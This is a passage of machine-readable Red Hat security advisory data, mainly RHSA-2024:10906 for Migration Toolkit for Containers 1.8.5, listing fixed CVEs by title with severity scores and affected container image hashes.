"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "dompurify: XSS vulnerability via prototype pollution", }, ], }
RHSA-2024:10906
Vulnerability from csaf_redhat
Published
2024-12-10 01:37
Modified
2025-04-10 05:29
Summary
Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update
Notes
Topic
The Migration Toolkit for Containers (MTC) 1.8.5 is now available.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
Details
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
Security Fix(es) from Bugzilla:
* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)
* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* go/build/constraint: golang: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "The Migration Toolkit for Containers (MTC) 1.8.5 is now available.\n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.\n\nSecurity Fix(es) from Bugzilla:\n\n* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n\n* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)\n\n* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\n* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n\n* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)\n\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:10906", url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2292787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292787", }, { category: "external", summary: "2295310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2295310", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "MIG-1458", url: "https://issues.redhat.com/browse/MIG-1458", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10906.json", }, ], title: "Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update", tracking: { current_release_date: "2025-04-10T05:29:15+00:00", generator: { date: "2025-04-10T05:29:15+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:10906", initial_release_date: "2024-12-10T01:37:19+00:00", revision_history: [ { date: "2024-12-10T01:37:19+00:00", number: "1", summary: "Initial version", }, { date: "2024-12-10T01:37:19+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T05:29:15+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "8Base-RHMTC-1.8", product: { name: "8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8", product_identification_helper: { cpe: "cpe:/a:redhat:rhmt:1.8::el8", }, }, }, ], category: "product_family", name: "Red Hat Migration Toolkit", }, { branches: [ { category: "product_version", name: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", product: { name: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", product_id: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-controller-rhel8&tag=v1.8.5-11", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", product: { name: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", product_id: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-hook-runner-rhel8&tag=v1.8.5-8", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", product: { name: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", product_id: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-log-reader-rhel8&tag=v1.8.5-8", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", product: { name: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", product_id: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-must-gather-rhel8&tag=v1.8.5-9", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", product: { name: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", product_id: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-openvpn-rhel8&tag=v1.8.5-6", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", product: { name: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", product_id: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-rhel8-operator&tag=v1.8.5-10", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", product: { name: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", product_id: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-operator-bundle&tag=v1.8.5-16", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", product: { name: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", product_id: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-registry-rhel8&tag=v1.8.5-6", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", product: { name: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", product_id: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-rsync-transfer-rhel8&tag=v1.8.5-7", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", product: { name: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", product_id: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-ui-rhel8&tag=v1.8.5-7", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", product: { name: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", product_id: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8&tag=v1.8.5-6", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", }, product_reference: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", }, product_reference: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", }, product_reference: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", }, product_reference: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", }, product_reference: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", }, product_reference: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", }, product_reference: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", }, product_reference: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64 as a component of 8Base-RHMTC-1.8", product_id: 